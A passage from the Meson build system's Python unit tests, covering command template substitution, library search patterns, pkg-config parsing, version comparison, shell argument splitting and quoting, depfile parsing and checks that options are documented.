'@PLAINNAME@.ok', '@OUTPUT0@'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) # One input, one output with a subdir outputs = ['dir/out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Two inputs, no outputs inputs = ['bar/foo.c.in', 'baz/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[1:]) cmd = ['@INPUT0@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) cmd = ['@INPUT0@', '@INPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Too many inputs cmd = ['@PLAINNAME@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@BASENAME@'] self.assertRaises(ME, substfunc, cmd, d) # No outputs cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTPUT0@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTDIR@'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, one output outputs = ['dir/out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': 
inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, two outputs outputs = ['dir/out.c', 'dir/out2.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[2:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir']) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] 
self.assertRaises(ME, substfunc, cmd, d) # Many outputs, can't use @OUTPUT@ like this cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) def test_needs_exe_wrapper_override(self): config = ConfigParser() config['binaries'] = { 'c': '\'/usr/bin/gcc\'', } config['host_machine'] = { 'system': '\'linux\'', 'cpu_family': '\'arm\'', 'cpu': '\'armv7\'', 'endian': '\'little\'', } # Can not be used as context manager because we need to # open it a second time and this is not possible on # Windows. configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.flush() configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) detected_value = env.need_exe_wrapper() os.unlink(configfilename) desired_value = not detected_value config['properties'] = { 'needs_exe_wrapper': 'true' if desired_value else 'false' } configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) forced_value = env.need_exe_wrapper() os.unlink(configfilename) self.assertEqual(forced_value, desired_value) def test_listify(self): listify = mesonbuild.mesonlib.listify # Test sanity self.assertEqual([1], listify(1)) self.assertEqual([], listify([])) self.assertEqual([1], listify([1])) # Test flattening self.assertEqual([1, 2, 3], listify([1, [2, 3]])) self.assertEqual([1, 2, 3], listify([1, [2, [3]]])) self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False)) # Test flattening and unholdering holder1 = ObjectHolder(1) self.assertEqual([holder1], listify(holder1)) self.assertEqual([holder1], listify([holder1])) self.assertEqual([holder1, 2], listify([holder1, 2])) self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]])) def test_unholder(self): unholder = 
mesonbuild.mesonlib.unholder holder1 = ObjectHolder(1) holder3 = ObjectHolder(3) holders = [holder1, holder3] self.assertEqual(1, unholder(holder1)) self.assertEqual([1], unholder([holder1])) self.assertEqual([1, 3], unholder(holders)) def test_extract_as_list(self): extract = mesonbuild.mesonlib.extract_as_list # Test sanity kwargs = {'sources': [1, 2, 3]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) self.assertEqual(kwargs, {'sources': [1, 2, 3]}) self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True)) self.assertEqual(kwargs, {}) # Test unholding holder3 = ObjectHolder(3) kwargs = {'sources': [1, 2, holder3]} self.assertEqual(kwargs, {'sources': [1, 2, holder3]}) # flatten nested lists kwargs = {'sources': [1, [2, [3]]]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) def test_pkgconfig_module(self): dummystate = mock.Mock() dummystate.subproject = 'dummy' _mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency) _mock.pcdep = mock.Mock() _mock.pcdep.name = "some_name" _mock.version_reqs = [] _mock = mock.Mock(held_object=_mock) # pkgconfig dependency as lib deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_libs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") # pkgconfig dependency as requires deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_reqs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") def _test_all_naming(self, cc, env, patterns, platform): shr = patterns[platform]['shared'] stc = patterns[platform]['static'] shrstc = shr + tuple([x for x in stc if x not in shr]) stcshr = stc + tuple([x for x in shr if x not in stc]) p = cc.get_library_naming(env, LibType.SHARED) self.assertEqual(p, shr) p = cc.get_library_naming(env, LibType.STATIC) self.assertEqual(p, stc) p = cc.get_library_naming(env, LibType.PREFER_STATIC) self.assertEqual(p, stcshr) p = cc.get_library_naming(env, 
LibType.PREFER_SHARED) self.assertEqual(p, shrstc) # Test find library by mocking up openbsd if platform != 'openbsd': return with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f: f.write('') found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED) self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0') def test_find_library_patterns(self): ''' Unit test for the library search patterns used by find_library() ''' unix_static = ('lib{}.a', '{}.a') msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib') # This is the priority list of pattern matching for library searching patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'), 'static': unix_static}, 'linux': {'shared': ('lib{}.so', '{}.so'), 'static': unix_static}, 'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'), 'static': unix_static}, 'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll', 'lib{}.dll.a', '{}.dll', '{}.dll.a'), 'static': ('cyg{}.a',) + unix_static}, 'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'), 'static': msvc_static}, 'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll', '{}.dll.a', '{}.lib', '{}.dll'), 'static': msvc_static}} env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if is_osx(): self._test_all_naming(cc, env, patterns, 'darwin') elif is_cygwin(): self._test_all_naming(cc, env, patterns, 'cygwin') elif is_windows(): if cc.get_argument_syntax() == 'msvc': self._test_all_naming(cc, env, patterns, 'windows-msvc') else: self._test_all_naming(cc, env, patterns, 'windows-mingw') elif is_openbsd(): 
self._test_all_naming(cc, env, patterns, 'openbsd') else: self._test_all_naming(cc, env, patterns, 'linux') env.machines.host.system = 'openbsd' self._test_all_naming(cc, env, patterns, 'openbsd') env.machines.host.system = 'darwin' self._test_all_naming(cc, env, patterns, 'darwin') env.machines.host.system = 'cygwin' self._test_all_naming(cc, env, patterns, 'cygwin') env.machines.host.system = 'windows' self._test_all_naming(cc, env, patterns, 'windows-mingw') @skipIfNoPkgconfig def test_pkgconfig_parse_libs(self): ''' Unit test for parsing of pkg-config output to search for libraries https://github.com/mesonbuild/meson/issues/3951 ''' def create_static_lib(name): if not is_osx(): name.open('w').close() return src = name.with_suffix('.c') out = name.with_suffix('.o') with src.open('w') as f: f.write('int meson_foobar (void) { return 0; }') subprocess.check_call(['clang', '-c', str(src), '-o', str(out)]) subprocess.check_call(['ar', 'csr', str(name), str(out)]) with tempfile.TemporaryDirectory() as tmpdir: pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True) env = get_fake_env() compiler = env.detect_c_compiler(MachineChoice.HOST) env.coredata.compilers.host = {'c': compiler} env.coredata.options[OptionKey('link_args', lang='c')] = FakeCompilerOptions() p1 = Path(tmpdir) / '1' p2 = Path(tmpdir) / '2' p1.mkdir() p2.mkdir() # libfoo.a is in one prefix create_static_lib(p1 / 'libfoo.a') # libbar.a is in both prefixes create_static_lib(p1 / 'libbar.a') create_static_lib(p2 / 'libbar.a') # Ensure that we never statically link to these create_static_lib(p1 / 'libpthread.a') create_static_lib(p1 / 'libm.a') create_static_lib(p1 / 'libc.a') create_static_lib(p1 / 'libdl.a') create_static_lib(p1 / 'librt.a') def fake_call_pkgbin(self, args, env=None): if '--libs' not in args: return 0, '', '' if args[-1] == 'foo': return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), '' if args[-1] == 'bar': return 0, '-L{} 
-lbar'.format(p2.as_posix()), '' if args[-1] == 'internal': return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), '' old_call = PkgConfigDependency._call_pkgbin old_check = PkgConfigDependency.check_pkgconfig PkgConfigDependency._call_pkgbin = fake_call_pkgbin PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin # Test begins try: kwargs = {'required': True, 'silent': True} foo_dep = PkgConfigDependency('foo', env, kwargs) self.assertEqual(foo_dep.get_link_args(), [(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()]) bar_dep = PkgConfigDependency('bar', env, kwargs) self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()]) internal_dep = PkgConfigDependency('internal', env, kwargs) if compiler.get_argument_syntax() == 'msvc': self.assertEqual(internal_dep.get_link_args(), []) else: link_args = internal_dep.get_link_args() for link_arg in link_args: for lib in ('pthread', 'm', 'c', 'dl', 'rt'): self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args) finally: # Test ends PkgConfigDependency._call_pkgbin = old_call PkgConfigDependency.check_pkgconfig = old_check # Reset dependency class to ensure that in-process configure doesn't mess up PkgConfigDependency.pkgbin_cache = {} PkgConfigDependency.class_pkgbin = PerMachine(None, None) def test_version_compare(self): comparefunc = mesonbuild.mesonlib.version_compare_many for (a, b, result) in [ ('0.99.beta19', '>= 0.99.beta14', True), ]: self.assertEqual(comparefunc(a, b)[0], result) for (a, b, op) in [ # examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison ("1.0010", "1.9", operator.gt), ("1.05", "1.5", operator.eq), ("1.0", "1", operator.gt), ("2.50", "2.5", operator.gt), ("fc4", "fc.4", operator.eq), ("FC5", "fc4", operator.lt), ("2a", "2.0", operator.lt), ("1.0", "1.fc4", operator.gt), ("3.0.0_fc", "3.0.0.fc", operator.eq), # from RPM tests ("1.0", "1.0", operator.eq), ("1.0", "2.0", operator.lt), ("2.0", "1.0", operator.gt), ("2.0.1", 
"2.0.1", operator.eq), ("2.0", "2.0.1", operator.lt), ("2.0.1", "2.0", operator.gt), ("2.0.1a", "2.0.1a", operator.eq), ("2.0.1a", "2.0.1", operator.gt), ("2.0.1", "2.0.1a", operator.lt), ("5.5p1", "5.5p1", operator.eq), ("5.5p1", "5.5p2", operator.lt), ("5.5p2", "5.5p1", operator.gt), ("5.5p10", "5.5p10", operator.eq), ("5.5p1", "5.5p10", operator.lt), ("5.5p10", "5.5p1", operator.gt), ("10xyz", "10.1xyz", operator.lt), ("10.1xyz", "10xyz", operator.gt), ("xyz10", "xyz10", operator.eq), ("xyz10", "xyz10.1", operator.lt), ("xyz10.1", "xyz10", operator.gt), ("xyz.4", "xyz.4", operator.eq), ("xyz.4", "8", operator.lt), ("8", "xyz.4", operator.gt), ("xyz.4", "2", operator.lt), ("2", "xyz.4", operator.gt), ("5.5p2", "5.6p1", operator.lt), ("5.6p1", "5.5p2", operator.gt), ("5.6p1", "6.5p1", operator.lt), ("6.5p1", "5.6p1", operator.gt), ("6.0.rc1", "6.0", operator.gt), ("6.0", "6.0.rc1", operator.lt), ("10b2", "10a1", operator.gt), ("10a2", "10b2", operator.lt), ("1.0aa", "1.0aa", operator.eq), ("1.0a", "1.0aa", operator.lt), ("1.0aa", "1.0a", operator.gt), ("10.0001", "10.0001", operator.eq), ("10.0001", "10.1", operator.eq), ("10.1", "10.0001", operator.eq), ("10.0001", "10.0039", operator.lt), ("10.0039", "10.0001", operator.gt), ("4.999.9", "5.0", operator.lt), ("5.0", "4.999.9", operator.gt), ("20101121", "20101121", operator.eq), ("20101121", "20101122", operator.lt), ("20101122", "20101121", operator.gt), ("2_0", "2_0", operator.eq), ("2.0", "2_0", operator.eq), ("2_0", "2.0", operator.eq), ("a", "a", operator.eq), ("a+", "a+", operator.eq), ("a+", "a_", operator.eq), ("a_", "a+", operator.eq), ("+a", "+a", operator.eq), ("+a", "_a", operator.eq), ("_a", "+a", operator.eq), ("+_", "+_", operator.eq), ("_+", "+_", operator.eq), ("_+", "_+", operator.eq), ("+", "_", operator.eq), ("_", "+", operator.eq), # other tests ('0.99.beta19', '0.99.beta14', operator.gt), ("1.0.0", "2.0.0", operator.lt), (".0.0", "2.0.0", operator.lt), ("alpha", "beta", operator.lt), ("1.0", 
    def test_msvc_toolset_version(self):
        '''
        Ensure that the toolset version returns the correct value for this MSVC
        '''
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Test only applies to MSVC-like compilers')
        toolset_ver = cc.get_toolset_version()
        self.assertIsNotNone(toolset_ver)
        # Visual Studio 2015 and older versions do not define VCToolsVersion
        # TODO: ICL doesn't set this in the VSC2015 profile either
        # cl versions < 19.10 correspond to VS2015 and older; nothing to
        # compare against in that case.
        if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
            return
        if 'VCToolsVersion' in os.environ:
            vctools_ver = os.environ['VCToolsVersion']
        else:
            # Fall back to reading the default toolset version from the VS
            # installation directory.
            self.assertIn('VCINSTALLDIR', os.environ)
            # See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
            vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
        # The full VCTools version (e.g. 14.16.27023) must begin with the
        # toolset version reported by the compiler (e.g. 14.16).
        self.assertTrue(vctools_ver.startswith(toolset_ver),
                        msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
r'C:\path\with\backslashes.cpp'], True), (r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True), (r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False), (r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False), (r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True), (r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False), (r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False), (r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True), ] else: test_data = [ (r"'a b c' d e", ['a b c', 'd', 'e'], True), (r"a/b/c d e", ['a/b/c', 'd', 'e'], True), (r"a\b\c d e", [r'abc', 'd', 'e'], False), (r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False), (r'"a b c" d e', ['a b c', 'd', 'e'], False), (r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False), (r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True), (r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True), (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False), (r"'a & b & c d e'", ['a & b & c d e'], True), (r"abd'e f'g h", [r'abde fg', 'h'], False), ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False), ('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False), ("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True), ('g++ -DNAME="Bob, Alice" test.cpp', ['g++', 
    def test_quote_arg(self):
        # Each entry is (raw_argument, expected_quoted_form). quote_arg must
        # produce exactly the expected string, and split_args must round-trip
        # it back to the raw argument.
        split_args = mesonbuild.mesonlib.split_args
        quote_arg = mesonbuild.mesonlib.quote_arg
        if is_windows():
            # cmd/CommandLineToArgvW-style quoting rules
            test_data = [
                ('', '""'),
                ('arg1', 'arg1'),
                ('/option1', '/option1'),
                ('/Ovalue', '/Ovalue'),
                ('/OBob&Alice', '/OBob&Alice'),
                ('/Ovalue with spaces', r'"/Ovalue with spaces"'),
                (r'/O"value with spaces"', r'"/O\"value with spaces\""'),
                (r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
                ('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
                ('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
                (r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
            ]
        else:
            # POSIX shell-style quoting rules
            test_data = [
                ('arg1', 'arg1'),
                ('--option1', '--option1'),
                ('-O=value', '-O=value'),
                ('-O=Bob&Alice', "'-O=Bob&Alice'"),
                ('-O=value with spaces', "'-O=value with spaces'"),
                ('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
                ('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
                ('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
            ]

        for (arg, expected) in test_data:
            self.assertEqual(quote_arg(arg), expected)
            # Quoting must be lossless: splitting the quoted form yields the
            # original argument again.
            self.assertEqual(split_args(expected)[0], arg)
    def test_depfile(self):
        # Each entry is (depfile_lines, target, expected_dependencies); the
        # DepFile parser must resolve transitive deps and tolerate cycles.
        for (f, target, expdeps) in [
                # empty, unknown target
                ([''], 'unknown', set()),
                # simple target & deps
                (['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
                (['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
                # get all deps
                (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
                (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
                # line continuation, multiple targets
                (['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
                (['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
                # \\ handling
                (['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
                # $ handling
                (['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
                (['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
                # cycles
                (['a: b', 'b: a'], 'a', set({'a', 'b'})),
                (['a: b', 'b: a'], 'b', set({'a', 'b'})),
        ]:
            d = mesonbuild.depfile.DepFile(f)
            deps = d.get_all_dependencies(target)
            # Order is unspecified; compare as sorted lists.
            self.assertEqual(sorted(deps), sorted(expdeps))
'/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) def test_dependency_factory_order(self): b = mesonbuild.dependencies.base with tempfile.TemporaryDirectory() as tmpdir: with chdir(tmpdir): env = get_fake_env() env.scratch_dir = tmpdir f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake']) f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig']) def test_validate_json(self) -> None: """Validate the json schema for the test cases.""" try: from jsonschema import validate, ValidationError except ImportError: if is_ci(): raise raise unittest.SkipTest('Python jsonschema module not found.') with Path('data/test.schema.json').open() as f: schema = json.load(f) errors = [] # type: T.Tuple[str, Exception] for p in Path('test cases').glob('**/test.json'): with p.open() as f: try: validate(json.load(f), schema=schema) except ValidationError as e: errors.append((p.resolve(), e)) for f, e in errors: print('Failed to validate: "{}"'.format(f)) print(str(e)) self.assertFalse(errors) @unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release') class DataTests(unittest.TestCase): def test_snippets(self): hashcounter = re.compile('^ *(#)+') snippet_dir = 
Path('docs/markdown/snippets') self.assertTrue(snippet_dir.is_dir()) for f in snippet_dir.glob('*'): self.assertTrue(f.is_file()) if f.parts[-1].endswith('~'): continue if f.suffix == '.md': in_code_block = False with f.open() as snippet: for line in snippet: if line.startswith(' '): continue if line.startswith('```'): in_code_block = not in_code_block if in_code_block: continue m = re.match(hashcounter, line) if m: self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name) self.assertFalse(in_code_block, 'Unclosed code block.') else: if f.name != 'add_release_note_snippets_here': self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name) def test_compiler_options_documented(self): ''' Test that C and C++ compiler options and base options are documented in Builtin-Options.md. Only tests the default compiler for the current platform on the CI. ''' md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) env = get_fake_env() # FIXME: Support other compilers cc = env.detect_c_compiler(MachineChoice.HOST) cpp = env.detect_cpp_compiler(MachineChoice.HOST) for comp in (cc, cpp): for opt in comp.get_options(): self.assertIn(str(opt), md) for opt in comp.base_options: self.assertIn(str(opt), md) self.assertNotIn('b_unknown', md) @staticmethod def _get_section_content(name, sections, md): for section in sections: if section and section.group(1) == name: try: next_section = next(sections) end = next_section.start() except StopIteration: end = len(md) # Extract the content for this section return md[section.end():end] raise RuntimeError('Could not find "{}" heading'.format(name)) def test_builtin_options_documented(self): ''' Test that universal options and base options are documented in Builtin-Options.md. 
''' from itertools import tee md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) found_entries = set() sections = re.finditer(r"^## (.+)$", md, re.MULTILINE) # Extract the content for this section content = self._get_section_content("Universal options", sections, md) subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE)) subcontent1 = self._get_section_content("Directories", subsections[0], content) subcontent2 = self._get_section_content("Core options", subsections[1], content) for subcontent in (subcontent1, subcontent2): # Find the option names options = set() # Match either a table row or a table heading separator: | ------ | rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE) # Skip the header of the first table next(rows) # Skip the heading separator of the first table next(rows) for m in rows: value = m.group(1) # End when the `buildtype` table starts if value is None: break options.add(value) self.assertEqual(len(found_entries & options), 0) found_entries |= options self.assertEqual(found_entries, set([ *[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS], *[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE], ])) # Check that `buildtype` table inside `Core options` matches how # setting of builtin options behaves # # Find all tables inside this subsection tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE) # Get the table we want using the header of the first column table = self._get_section_content('buildtype', tables, subcontent2) # Get table row data rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE) env = get_fake_env() for m in rows: buildtype, debug, opt = m.groups() if debug == 'true': debug = True elif debug == 'false': debug = False else: raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group())) 
    def test_cpu_families_documented(self):
        '''
        Ensure that every CPU family known to mesonbuild.environment is listed
        in the "CPU families" table of Reference-tables.md, and vice versa.
        '''
        with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)

        sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
        content = self._get_section_content("CPU families", sections, md)
        # Find the list entries
        arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
        # Drop the header
        arches = set(arches[1:])
        # Exact set equality: doc and code must match in both directions.
        self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
